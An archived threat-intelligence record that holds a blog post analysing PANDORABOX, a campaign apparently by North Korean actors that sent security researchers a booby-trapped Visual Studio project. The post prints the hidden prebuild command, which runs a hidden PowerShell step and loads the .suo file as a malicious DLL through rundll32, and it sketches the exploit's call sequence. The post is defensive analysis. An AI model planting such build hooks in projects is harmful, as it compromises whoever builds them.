{
	"id": "59041a9e-d9fc-4756-8cd5-fe3fca9bda61",
	"created_at": "2026-04-06T01:32:05.943053Z",
	"updated_at": "2026-04-10T03:21:24.400951Z",
	"deleted_at": null,
	"sha1_hash": "9da26c5a4a70dad864eb5b3eb10b1ed54de8a70f",
	"title": "PANDORABOX - North Koreans target security researchers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 109547,
	"plain_text": "PANDORABOX - North Koreans target security researchers\r\nPublished: 2021-01-26 · Archived: 2026-04-06 00:22:44 UTC\r\nIntroduction\r\nToday, Google’s Threat Analysis Group (TAG) published a blogpost explaining that several security researchers\r\nhave been targeted by (allegedly) North Korea. Since the operation seems to be targeting the curiosity of security\r\nresearchers as an enabler for a successful operation, we dubbed this operation PANDORABOX .\r\nNo explanation was given on the attribution but Costin Raiu posted a screenshot from the Kaspersky Threat\r\nAttribution Engine which highlights code sharing between Manuscrypt (Lazarus). Note, that this alone isn’t\r\nenough for a successful attribution as it can be easily misled - maybe Google TAG has more information since\r\nthey seemed to be so sure about who was behind the operation?\r\nThe campaign seems to have been on-going for a while because the persona James Willy (james0x40) created his\r\nGitHub account on the 16th April 2020.\r\nTwo attack vectors were identified:\r\nThe attacker would send a link to their blog, which would trigger a Chrome exploit (CVE-2020-15994 ?)\r\nand infect the machine.\r\nhttps://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/\r\nPage 1 of 4\n\nThe attacker would share a malicious visual studio project ( lpe-poc.zip ) over email or Telegram.\r\nVisual Studio Project\r\nWe will focus on the Visual Studio project. The dxgkrnl_poc.vcxproj VS project contains a prebuild command\r\nwhich force-load dxgkrnl_poc.vcxproj.suo . As you can see the attackers, added several whitespaces to not\r\nmake the command too obvious when someone would have a look.\r\n \u003cPreBuildEvent\u003e\r\n \u003cCommand\u003e\r\n \u003c/PreBuildEvent\u003e\r\npowershell -executionpolicy bypass -windowstyle hidden\r\nif(([system.environment]::osversion.version.major -eq 10) -and\r\n[system.environment]::is64bitoperatingsystem -and (Test-Path $(TargetName).vcxproj.suo)){rundll32\r\n$(TargetName).vcxproj.suo,CMS_dataFinal Bx9yb37GEcJNK6bt 4231}\r\nThe first parameter ( Bx9yb37GEcJNK6bt ) which is decryption key for strings, the same key can be found in the\r\nGoogle’s TAG blogpost - which makes sense if the DLL shared across all the targets is the same. Unlike the\r\nsecond parameter - here 4231 - which is different from the Google TAG id ( 4901 ) this could be a potential\r\nhttps://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/\r\nPage 2 of 4\n\nidentifier for the victims. This imply that the Visual Studio Project file had to be modified before being sent to\r\neach victim. Although, 5000 seems like a very high number of security researchers to be targeted. I don’t even\r\nknow if the global pool of security researchers is that big. Nonetheless, if you have been targeted don’t hesitate to\r\nping me on twitter at @msuiche to confirm your id is also different.\r\nThe dxgkrnl_poc.vcxproj.suo dll SHA2 hash is the following\r\n4C3499F3CC4A4FDC7E67417E055891C78540282DCCC57E37A01167DFE351B244 . More information about this file can be\r\nfound on Norfolk blog.\r\nProject 1: D3DKMTPresentMultiPlaneOverlay3\r\nWhat’s the LPE, though?\r\nvoid main()\r\n{\r\nEnumerateAdapters1();\r\nDxgkCreateDevice();\r\nDxgkCreateContext();\r\nDxgkCreatePrimaryAllocation();\r\nDxgkSetVidPnSourceOwner();\r\nDxgkSetDisplayMode();\r\nDxgkPresentMutiPlaneOverlay3();\r\n}\r\nThe LPE seems to be targeted a DirectX vulnerability, which we were not able to reproduce, which gets triggered\r\nby D3DKMTPresentMultiPlaneOverlay3 function.\r\nThis is kind of ironic because the group seems to have also targeted k0shl who wrote a blogpost about a\r\nD3DKMTPresentMultiPlaneOverlay3 vulnerability (CVE-2018-8165 found by Richard Zhu) few years ago.\r\nNo additional details on the dxgkrnl!DxgkPresentMultiPlaneOverlay3 vulnerability will be provided since we\r\nare unable to say if we weren’t able to reproduce the issue because only specific configurations can be triggered or\r\nbecause this vulnerability has already been patched.\r\nProject 2: Direct Composition Vulnerability (CVE-2020-17057)\r\nThere is a also second archive that was shared with the security researchers with a working exploit for what seem\r\nto be CVE-2020-17057.\r\nConclusion\r\nhttps://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/\r\nPage 3 of 4\n\nIf you have a different id as a second parameter for the archive don’t hesitate to contact me on Twitter at\r\n@msuiche, and if you encountered another archive project too. It would be interesting to connect the dots.\r\n360 Threat Intelligence Team linked the operation to the DREAMJOB Operation.\r\nSource: https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/\r\nhttps://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/"
	],
	"report_names": [
		"pandorabox-north-koreans-target-security-researchers"
	],
	"threat_actors": [],
	"ts_created_at": 1775439125,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9da26c5a4a70dad864eb5b3eb10b1ed54de8a70f.pdf",
		"text": "https://archive.orkl.eu/9da26c5a4a70dad864eb5b3eb10b1ed54de8a70f.txt",
		"img": "https://archive.orkl.eu/9da26c5a4a70dad864eb5b3eb10b1ed54de8a70f.jpg"
	}
}